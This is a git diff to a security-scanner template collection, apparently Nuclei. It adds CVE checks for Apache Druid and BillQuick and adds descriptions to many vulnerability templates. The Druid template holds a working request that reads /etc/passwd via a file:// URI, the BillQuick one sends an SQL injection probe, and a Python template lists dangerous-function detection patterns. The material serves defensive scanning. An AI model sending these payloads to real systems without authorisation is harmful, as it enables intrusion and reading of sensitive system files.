diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index a158694063..705f870c7e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -20,10 +20,8 @@ jobs: - name: Installing Nuclei # if: steps.cache-go.outputs.cache-hit != 'true' - env: - GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest shell: bash - name: Template Validation diff --git a/README.md b/README.md index 47d02bb65e..46fe32d081 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2418 files**. +**177 directories, 2443 files**. diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml new file mode 100644 index 0000000000..c0f1e3224e --- /dev/null +++ b/cves/2021/CVE-2021-36749.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml new file mode 100644 index 0000000000..64def1d504 --- /dev/null +++ b/cves/2021/CVE-2021-42258.yaml @@ -0,0 +1,64 @@ +id: CVE-2021-42258 + +info: + name: BillQuick Web Suite SQLi + author: dwisiswant0 + severity: high + tags: cve,cve2021,sqli,billquick + description: | + BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 + allows SQL injection for unauthenticated remote code execution, + as exploited in the wild in October 2021 for ransomware installation. + SQL injection can, for example, use the txtID (aka username) parameter. + Successful exploitation can include the ability to execute + arbitrary code as MSSQLSERVER$ via xp_cmdshell. + reference: + - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + + cookie-reuse: true + extractors: + - type: xpath + name: VS + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATE']" + + - type: xpath + name: VSG + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" + + - type: xpath + name: EV + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__EVENTVALIDATION']" + + matchers: + - type: word + part: body + condition: and + words: + - "System.Data.SqlClient.SqlException" + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml new file mode 100644 index 0000000000..0a0ee65364 --- /dev/null +++ b/exposed-panels/redis-commander-exposure.yaml @@ -0,0 +1,22 @@ +id: redis-commander-exposure + +info: + name: Redis Commander Exposure + author: dahse89 + severity: low + reference: + - https://joeferner.github.io/redis-commander/ + - https://github.com/joeferner/redis-commander + tags: panel,redis + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + condition: and + words: + - "Redis Commander" + - "redisCommanderBearerToken" diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6f7b8770d6..c949abfae5 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,7 +4,7 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions + description: Indicators for dangerous Python functions reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html @@ -17,7 +17,7 @@ file: extractors: - type: regex - name: Possible Code Injection + name: code-injection regex: - 'exec' - 'eval' @@ -25,7 +25,7 @@ file: - type: regex - name: Possible Command Injection + name: command-injection regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -33,18 +33,18 @@ file: - type: regex - name: Possibly Unpickling untrusted source + name: untrusted-source regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Possibly loading dangerous YAMLs + name: dangerous-yaml regex: - 'yaml.load' - type: regex - name: Possible SQLi + name: sqli regex: - - 'cursor.execute' + - 'cursor.execute' \ No newline at end of file diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 382d65e232..7e3f5cd21d 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,7 +4,7 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server reference: https://www.exploit-db.com/exploits/49986 tags: solarlog,auth-bypass diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 07225c62db..733c46e297 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -3,6 +3,7 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high + description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. reference: - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 8a936e9aa0..56ccbcbe76 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. reference: https://xz.aliyun.com/t/2490 tags: spark,unauth diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index c1e677dcb7..199d945cd7 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -4,6 +4,7 @@ info: name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 6f612b4f78..a59b7b3bd1 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Vehicle Parking Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. reference: https://www.exploit-db.com/exploits/48877 tags: auth-bypass requests: diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 82d1fab54a..384fe2d49f 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index b73ec6dc84..db201ad502 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium tags: xss - + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml index 1c669ac324..6225458a19 100644 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml @@ -4,6 +4,7 @@ info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ tags: wordpress,wp-plugin diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index d649437101..4b8b194cfc 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 64d1b30634..c7641f841a 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko severity: low + description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 683cf92dc3..226a87797b 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -3,6 +3,7 @@ info: name: WordPress accessible wp-config author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. tags: wordpress,backup requests: diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 63829a085e..e4cb6515af 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -4,6 +4,7 @@ info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high + description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml index 8539ff6058..9a474dff0a 100644 --- a/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -4,7 +4,7 @@ info: name: wordpress-upload-data author: pussycat0x severity: medium - description: Searches for Passwords in the wordpress uploads directory. + description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing